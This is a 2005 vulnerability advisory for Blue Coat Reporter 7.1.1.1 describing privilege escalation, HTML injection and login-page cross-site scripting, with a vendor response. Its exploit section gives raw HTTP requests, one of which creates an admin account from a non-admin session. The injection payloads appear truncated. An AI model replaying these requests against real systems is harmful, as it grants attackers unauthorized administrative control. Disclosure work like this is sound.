Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities
============================================================
Blue Coat Reporter
==================
"Blue Coat Reporter 7 provides identity-based reporting on Web
communications enabling enterprises to evaluate Web policies and manage
network resources more effectively. "
Product/Version
===============
Blue Coat Reporter 7.1.1.1
Running on Win32
Vulnerabilities
===============
a) Privilege escalation
A user without administrative privileges is able to create a useraccount
with administrative privileges.
b) HTML-Code Injection
Unauthenticated users can inject html-code into the application. The
code will be executed, if an authenticated user is viewing the affected
website.
c) Cross Site Scripting at login page
Supplying scriptcode instead of a valid username at the login page will
end in a cross site scripting.
Exploiting
==========
a) Privlege escalation
1) Create a non-priv user (user: test, pass: test)
2) Log in with the non-administrative user account
3) Sent the following request to create a user hurz with password hurz and
admin privileges.
POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test;
authpassword7=098f6bcd4621d373cade4e832627b4f6
Content-Length: 170
submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.user.profiles.0=profile1&volatile.form_type=new
b) HTML-Code Injection
POST
/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid
Content-Length: 100
volatile.add_license=&volatile.license_to_add=
c) Cross Site Scripting at login page
Supply the following username at the login page:
"/>
Vendor
======
Blue Coat was responding to my message very fast and in a very professional
way. Exemplary!
Homepage: http://www.bluecoat.com
Advisory:
http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html
Discovered
==========
19.05.2005 by Oliver Karow
http://www.oliverkarow.de/research/bluecoat.htm
--
Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie!
Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl